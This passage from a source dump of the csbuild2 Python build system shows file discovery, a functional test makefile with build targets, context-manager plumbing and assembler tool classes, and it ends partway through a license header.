The directory will be created if it does not exist.\n\n\t\t:param inputFile: The input file to use for constructing the directory.\n\t\t:type inputFile: :class:`csbuild.input_file.InputFile`\n\t\t:return: Unique intermediate directory path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tdirectory = os.path.join(self.intermediateDir, self.name, inputFile.uniqueDirectoryId)\n\n\t\t#TODO: Investigate a lock-free solution to creating this directory.\n\t\tif not os.access(directory, os.F_OK):\n\t\t\t# Lock in case multiple threads get here at the same time.\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith Project._lock:\n\t\t\t\t# If the directory still does not exist, create it.\n\t\t\t\tif not os.access(directory, os.F_OK):\n\t\t\t\t\tos.makedirs(directory)\n\t\treturn PlatformUnicode(directory)\n\n\tdef RediscoverFiles(self):\n\t\t\"\"\"\n\t\t(Re)-Run source file discovery.\n\t\tIf autoDiscoverSourceFiles is enabled, this will recursively search the working directory and all extra directories\n\t\tto find source files.\n\t\tManually specified source files are then added to this list.\n\t\tNote that even if autoDiscoverSourceFiles is disabled, this must be called again in order to update the source\n\t\tfile list after a preBuildStep.\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"File discovery\"):\n\t\t\tlog.Info(\"Discovering files for {}...\", self)\n\t\t\tself.inputFiles = {}\n\n\t\t\tsearchDirectories = ordered_set.OrderedSet(self.sourceDirs)\n\n\t\t\tif self.autoDiscoverSourceFiles:\n\t\t\t\tsearchDirectories |= ordered_set.OrderedSet([self.workingDirectory])\n\n\t\t\textensionList = self.toolchain.GetSearchExtensions()\n\n\t\t\texcludeFiles = [\n\t\t\t\tos.path.abspath(os.path.join(self.workingDirectory, filename))\n\t\t\t\tfor filename in self.excludeFiles\n\t\t\t]\n\n\t\t\twith perf_timer.PerfTimer(\"Walking working dir\"):\n\t\t\t\tfor sourceDir in searchDirectories:\n\t\t\t\t\tlog.Build(\"Collecting files from {}\", sourceDir)\n\t\t\t\t\tfor root, _, filenames in os.walk(sourceDir):\n\t\t\t\t\t\tif not filenames:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tabsroot = os.path.abspath(root)\n\t\t\t\t\t\tif absroot in self.excludeDirs:\n\t\t\t\t\t\t\tif absroot != self.csbuildDir:\n\t\t\t\t\t\t\t\tlog.Info(\"Skipping dir {}\", root)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif \".csbuild\" in root \\\n\t\t\t\t\t\t\t\tor root.startswith(self.intermediateDir) \\\n\t\t\t\t\t\t\t\tor (root.startswith(self.outputDir) and self.outputDir != self.workingDirectory):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif absroot == self.csbuildDir or absroot.startswith(self.csbuildDir):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tfound = False\n\t\t\t\t\t\tfor testDir in self.excludeDirs:\n\t\t\t\t\t\t\tif absroot.startswith(testDir):\n\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif found:\n\t\t\t\t\t\t\tif not absroot.startswith(self.csbuildDir):\n\t\t\t\t\t\t\t\tlog.Info(\"Skipping directory {}\", root)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tlog.Info(\"Looking in directory {}\", root)\n\t\t\t\t\t\twith perf_timer.PerfTimer(\"Collecting files\"):\n\t\t\t\t\t\t\tfor extension in extensionList:\n\t\t\t\t\t\t\t\tlog.Info(\"Checking for {}\", extension)\n\t\t\t\t\t\t\t\tself.inputFiles.setdefault(extension, ordered_set.OrderedSet()).update(\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\tinput_file.InputFile(\n\t\t\t\t\t\t\t\t\t\t\tos.path.join(absroot, filename)\n\t\t\t\t\t\t\t\t\t\t) for filename in filenames if os.path.splitext(filename)[1] == extension\n\t\t\t\t\t\t\t\t\t\tand os.path.join(absroot, filename) not in 
self.lastRunArtifacts\n\t\t\t\t\t\t\t\t\t\tand os.path.join(absroot, filename) not in excludeFiles\n\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t)\n\n\t\t\twith perf_timer.PerfTimer(\"Processing source files\"):\n\t\t\t\tfor filename in self.sourceFiles:\n\t\t\t\t\textension = os.path.splitext(filename)[1]\n\t\t\t\t\tself.inputFiles.setdefault(extension, ordered_set.OrderedSet()).add(input_file.InputFile(filename))\n\n\t\t\tlog.Info(\"Discovered {}\", self.inputFiles)\n" }, { "alpha_fraction": 0.747826099395752, "alphanum_fraction": 0.7532919049263, "avg_line_length": 31.45967674255371, "blob_id": "b35051773f6440ecb5a7c5a5ade6d30653c2dfeb", "content_id": "a1a5cd39b78604654131588aa0b741ab1db67306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4025, "license_type": "no_license", "max_line_length": 116, "num_lines": 124, "path": "/functional_tests/cpp_features_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\ncsbuild.SetOutputDirectory(\"out\")\n\n# pylint: disable=invalid-name,missing-docstring\ndef defineProjectSettings(projectName, debugLevel, optLevel, useStaticRuntime, useDebugRuntime, defines, undefines):\n\t#TODO: Disable the msvc compiler warning: D9025 : overriding '/DIMPLICIT_DEFINE' with '/UIMPLICIT_DEFINE'\n\tcsbuild.SetDebugLevel(debugLevel)\n\tcsbuild.SetOptimizationLevel(optLevel)\n\tcsbuild.SetStaticRuntime(useStaticRuntime)\n\tcsbuild.SetDebugRuntime(useDebugRuntime)\n\tcsbuild.AddDefines(\"IMPLICIT_DEFINE\", *defines)\n\tcsbuild.AddUndefines(*undefines)\n\tcsbuild.SetOutput(projectName, csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\"):\n\twith csbuild.Target(\"nosymbols_noopt_dynamic_release\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\twith csbuild.Target(\"embeddedsymbols_sizeopt_static_release\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.EmbeddedSymbols,\n\t\t\tcsbuild.OptimizationLevel.Size,\n\t\t\tTrue,\n\t\t\tFalse,\n\t\t\t[\"EXPLICIT_DEFINE\"],\n\t\t\t[],\n\t\t)\n\twith csbuild.Target(\"externalsymbols_speedopt_dynamic_debug\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.ExternalSymbols,\n\t\t\tcsbuild.OptimizationLevel.Speed,\n\t\t\tFalse,\n\t\t\tTrue,\n\t\t\t[],\n\t\t\t[\"IMPLICIT_DEFINE\"],\n\t\t)\n\twith csbuild.Target(\"externalplussymbols_maxopt_static_debug\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.ExternalSymbolsPlus,\n\t\t\tcsbuild.OptimizationLevel.Max,\n\t\t\tTrue,\n\t\t\tTrue,\n\t\t\t[\"EXPLICIT_DEFINE\"],\n\t\t\t[\"IMPLICIT_DEFINE\"],\n\t\t)\n\twith csbuild.Target(\"incremental_linking\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\twith csbuild.Target(\"custom_options\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\t\twith csbuild.Toolchain(\"msvc\"):\n\t\t\tcsbuild.AddCompilerCxxFlags(\"/W4\")\n\t\t\tcsbuild.AddLinkerFlags(\"/STACK:1048576\")\n\t\twith csbuild.Toolchain(\"gcc\", \"clang\"):\n\t\t\tcsbuild.AddCompilerCxxFlags(\"-Wunused-variable\")\n\t\t\tcsbuild.AddLinkerFlags(\"-shared-libgcc\")\n\nwith csbuild.Project(\"cc_standard\", \"cc_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCcLanguageStandard(\"c11\")\n\nwith csbuild.Project(\"cxx_standard\", \"cxx_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCxxLanguageStandard(\"c++14\")\n\nwith csbuild.Project(\"incremental_linking\", \"cc_standard\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\tcsbuild.SetCcLanguageStandard(\"c11\")\n\tcsbuild.SetIncrementalLink(True)\n" }, { "alpha_fraction": 0.7105863690376282, "alphanum_fraction": 0.7117938995361328, "avg_line_length": 28.693227767944336, "blob_id": "5d96796cc7cfc7e7e650f310a48ed2f68bffeb89", "content_id": "ba5e4ea83d289740d344f5092cf3584c32760b50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 7453, "license_type": "no_license", "max_line_length": 143, "num_lines": 251, "path": "/csbuild/_build/context_manager.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: context_manager\n\t:synopsis: base context manager class\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport sys\nimport types\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass NestedContext(object):\n\t\"\"\"\n\tRepresents a nested context, allowing context managers to be chained, a la csbuild.Toolchain(\"foo\").Architecture(\"bar\")\n\n\t:param cls: The ContextManager being nested\n\t:type cls: ContextManager\n\t:param currentContext: The ContextManager it's being nested into\n\t:type currentContext: ContextManager\n\t\"\"\"\n\tdef __init__(self, cls, currentContext):\n\t\tself.cls = cls\n\t\tself.ctx = currentContext\n\n\tdef __call__(self, *args, **kwargs):\n\t\tret = self.cls(*args, **kwargs)\n\t\t# pylint: disable=protected-access\n\t\tret._parentContext = self.ctx\n\t\treturn ret\n\nclass MultiDataContext(object):\n\t\"\"\"Contains multiple pieces of data returned from a function - typically a list of functions to call.\"\"\"\n\tdef __init__(self, contexts):\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tself._contexts = contexts\n\t\tself._previousResolver = None\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\t@property\n\tdef contexts(self):\n\t\t\"\"\"Get access to the contexts used for this manager\"\"\"\n\t\treturn self._contexts\n\n\tdef __enter__(self):\n\t\t\"\"\"\n\t\tEnter the context, making the listed contexts active\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\n\t\t# pylint: disable=protected-access\n\t\tself._previousResolver = csbuild._resolver\n\t\tcsbuild._resolver = self\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\tdef __exit__(self, excType, excValue, traceback):\n\t\t\"\"\"\n\t\tLeave the context\n\n\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t:type excType: type\n\t\t:param excValue: value of thrown exception (ignored)\n\t\t:type excValue: any\n\t\t:param traceback: traceback attached to the thrown exception (ignored)\n\t\t:type 
traceback: traceback\n\t\t:return: Always false\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\t# pylint: disable=protected-access\n\t\tcsbuild._resolver = self._previousResolver\n\t\treturn False\n\n\tdef __getattribute__(self, name):\n\t\tif object.__getattribute__(self, \"inself\"):\n\t\t\treturn object.__getattribute__(self, name)\n\n\t\tcontexts = object.__getattribute__(self, \"_contexts\")\n\n\t\tfuncs = []\n\t\tfor context in contexts:\n\t\t\tif hasattr(context, name):\n\t\t\t\tfuncs.append(getattr(context, name))\n\n\t\tif funcs:\n\t\t\tdef _wrapDataMethods(*args, **kwargs):\n\t\t\t\trets = []\n\t\t\t\twith self:\n\t\t\t\t\tfor func in funcs:\n\t\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\treturn MultiDataContext(rets)\n\n\t\t\treturn _wrapDataMethods\n\n\t\treturn object.__getattribute__(self, name)\n\nclass ContextManager(object):\n\t\"\"\"\n\tBase type for a context manager, used to set context for project plan settings\n\t:param contexts: list of contexts to activate within this manager's scope\n\t:type contexts: tuple(tuple(str, tuple(str, bytes)))\n\t:param methodResolvers: List of objects on which to look for additional methods for, i.e., csbuild.Toolchain(\"tc\").ToolchainSpecificFunction()\n\t:type methodResolvers: list(objects)\n\t\"\"\"\n\n\tmethodResolvers = []\n\n\tdef __init__(self, contexts, methodResolvers=None):\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tself._contexts = contexts\n\t\tself._methodResolvers = methodResolvers\n\t\tself._previousResolver = None\n\t\tself._parentContext = None\n\t\tself._inContext = False\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\t@property\n\tdef contexts(self):\n\t\t\"\"\"Get access to the contexts used for this manager\"\"\"\n\t\treturn self._contexts\n\n\t@property\n\tdef resolvers(self):\n\t\t\"\"\"Get access to the resolvers used for this manager\"\"\"\n\t\treturn self._methodResolvers\n\n\tdef __enter__(self):\n\t\t\"\"\"\n\t\tEnter the context, making the listed contexts active\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\t\tif self._parentContext is not None:\n\t\t\tobject.__getattribute__(self._parentContext, \"__enter__\")()\n\t\tif self._contexts is not None:\n\t\t\tcsbuild.currentPlan.EnterContext(*self._contexts)\n\n\t\tif self._methodResolvers:\n\t\t\tContextManager.methodResolvers.append(self._methodResolvers)\n\n\t\t\t# pylint: disable=protected-access\n\t\t\tself._previousResolver = csbuild._resolver\n\t\t\tcsbuild._resolver = self\n\n\t\tself._inContext = True\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\n\tdef __exit__(self, excType, excValue, traceback):\n\t\t\"\"\"\n\t\tLeave the context\n\n\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t:type excType: type\n\t\t:param excValue: value of thrown exception (ignored)\n\t\t:type excValue: any\n\t\t:param traceback: traceback attached to the thrown exception (ignored)\n\t\t:type traceback: traceback\n\t\t:return: Always false\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tobject.__setattr__(self, \"inself\", True)\n\n\t\tif self._methodResolvers:\n\t\t\t# pylint: disable=protected-access\n\t\t\tcsbuild._resolver = self._previousResolver\n\t\t\tContextManager.methodResolvers.pop()\n\n\t\tif self._contexts is not None:\n\t\t\tcsbuild.currentPlan.LeaveContext()\n\n\t\tif self._parentContext is not None:\n\t\t\tobject.__getattribute__(self._parentContext, \"__exit__\")(excType, excValue, traceback)\n\n\t\tself._inContext = False\n\n\t\tobject.__setattr__(self, \"inself\", False)\n\t\treturn False\n\n\tdef 
__getattribute__(self, name):\n\t\tif object.__getattribute__(self, \"inself\"):\n\t\t\treturn object.__getattribute__(self, name)\n\n\t\tif object.__getattribute__(self, '_inContext') is False:\n\t\t\twith self:\n\t\t\t\treturn getattr(self, name)\n\n\t\tif ContextManager.methodResolvers:\n\t\t\tfuncs = set()\n\n\t\t\tfor resolverList in ContextManager.methodResolvers:\n\t\t\t\tfor resolver in resolverList:\n\t\t\t\t\tif hasattr(resolver, name):\n\t\t\t\t\t\tfuncs.add(getattr(resolver, name))\n\n\t\t\tif funcs:\n\t\t\t\tdef _wrapResolverMethods(*args, **kwargs):\n\t\t\t\t\trets = []\n\t\t\t\t\tfor func in funcs:\n\t\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\t\tif len(rets) == 1:\n\t\t\t\t\t\treturn rets[0]\n\t\t\t\t\tif len(rets) > 1:\n\t\t\t\t\t\treturn MultiDataContext(rets)\n\t\t\t\t\treturn None\n\n\t\t\t\treturn _wrapResolverMethods\n\n\t\t# pylint: disable=protected-access\n\t\tif hasattr(csbuild, name):\n\t\t\tobj = getattr(csbuild, name)\n\t\t\tif isinstance(obj, types.FunctionType):\n\t\t\t\tdef _wrapCsbuildMethod(*args, **kwargs):\n\t\t\t\t\twith self:\n\t\t\t\t\t\tobj(*args, **kwargs)\n\n\t\t\t\treturn _wrapCsbuildMethod\n\n\t\t\tif isinstance(obj, (_classType, _typeType)) and issubclass(obj, ContextManager):\n\t\t\t\treturn NestedContext(obj, self)\n\t\t\treturn obj\n\n\t\treturn object.__getattribute__(self, name)\n" }, { "alpha_fraction": 0.6307901740074158, "alphanum_fraction": 0.632541835308075, "avg_line_length": 33.253334045410156, "blob_id": "4e15d834a6467a3c5311a991eb905746fe9412df", "content_id": "186a53e54c343200e7732c917a5b3456fdc5b6a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5138, "license_type": "no_license", "max_line_length": 108, "num_lines": 150, "path": "/csbuild/tools/assemblers/assembler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: assembler_base\n\t:synopsis: Base class for assemblers\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import (\n\tHasDebugLevel,\n\tHasDefines,\n\tHasIncludeDirectories,\n)\n\nfrom ... 
import commands, log\n\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass AssemblerBase(HasDebugLevel, HasDefines, HasIncludeDirectories):\n\t\"\"\"\n\tBase class for assemblers\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\n\t\tself._asmFlags = projectSettings.get(\"asmFlags\", [])\n\n\t\tself._projectTypeDefines = {\n\t\t\tcsbuild.ProjectType.Application: \"CSB_APPLICATION=1\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"CSB_SHARED_LIBRARY=1\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \"CSB_STATIC_LIBRARY=1\",\n\t\t}\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddAssemblerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd assembler flags.\n\n\t\t:param flags: List of asm flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"asmFlags\", flags)\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFile):\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFile):\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\n\t\tif project.projectType in self._projectTypeDefines:\n\t\t\tself._defines.add(self._projectTypeDefines[project.projectType])\n\n\t\tself._defines.add(\"CSB_TARGET_{}=1\".format(project.targetName.upper()))\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. 
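# ---- Illustrative aside (not part of the source record above) ----
# A minimal sketch of a concrete tool built on AssemblerBase above, assuming
# it is importable from its record path. Only _getCommand and _getOutputFiles
# must be supplied by a subclass; the executable name "hypothetical-as" and
# its flag spelling are invented for illustration.
import os

from csbuild.tools.assemblers.assembler_base import AssemblerBase

class HypotheticalAssembler(AssemblerBase):
	supportedArchitectures = {"x64", "x86"}
	outputFiles = {".o"}

	def _getOutputFiles(self, project, inputFile):
		# One object file per input, placed in the per-file intermediate dir.
		base = os.path.splitext(os.path.basename(inputFile.filename))[0]
		return (os.path.join(project.GetIntermediateDirectory(inputFile), base + ".o"),)

	def _getCommand(self, project, inputFile):
		# Pass through user asm flags collected by the base class.
		outputFile = self._getOutputFiles(project, inputFile)[0]
		return ["hypothetical-as"] + self._asmFlags + ["-o", outputFile, inputFile.filename]
# ---- End aside ----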
If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Assembling {} ({}-{}-{})...\",\n\t\t\tinputFile,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.6946471929550171, "alphanum_fraction": 0.6962692737579346, "avg_line_length": 37.53125, "blob_id": "601c6ce0d5afd8b8665c61c4b8816c4568737580", "content_id": "bbe255058d938680e042cb49bac4b5ef0ca2e97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2466, "license_type": "no_license", "max_line_length": 117, "num_lines": 64, "path": "/csbuild/tools/assemblers/android_gcc_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_gcc_assembler\n\t:synopsis: Android GCC assember tool\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom ..common.android_tool_base import AndroidToolBase\n\nfrom .gcc_assembler import GccAssembler\n\nclass AndroidGccAssembler(GccAssembler, AndroidToolBase):\n\t\"\"\"\n\tAndroid GCC assembler implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\tdef __init__(self, projectSettings):\n\t\tGccAssembler.__init__(self, projectSettings)\n\t\tAndroidToolBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccAssembler.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\tdef _getComplierName(self):\n\t\treturn self._androidInfo.gccPath\n\n\tdef _getArchitectureArgs(self, project):\n\t\t# The architecture is implied from the executable being run.\n\t\treturn []\n" }, { "alpha_fraction": 0.7092182040214539, "alphanum_fraction": 0.7110852003097534, "avg_line_length": 30.507352828979492, "blob_id": "4356f224437f60335ad8cabe259c7434df359769", "content_id": "66e5ba53a9cfc15af83b5d1033dfcc8e99b98e27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4285, "license_type": "no_license", "max_line_length": 98, "num_lines": 136, "path": "/csbuild/_utils/settings_manager.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# 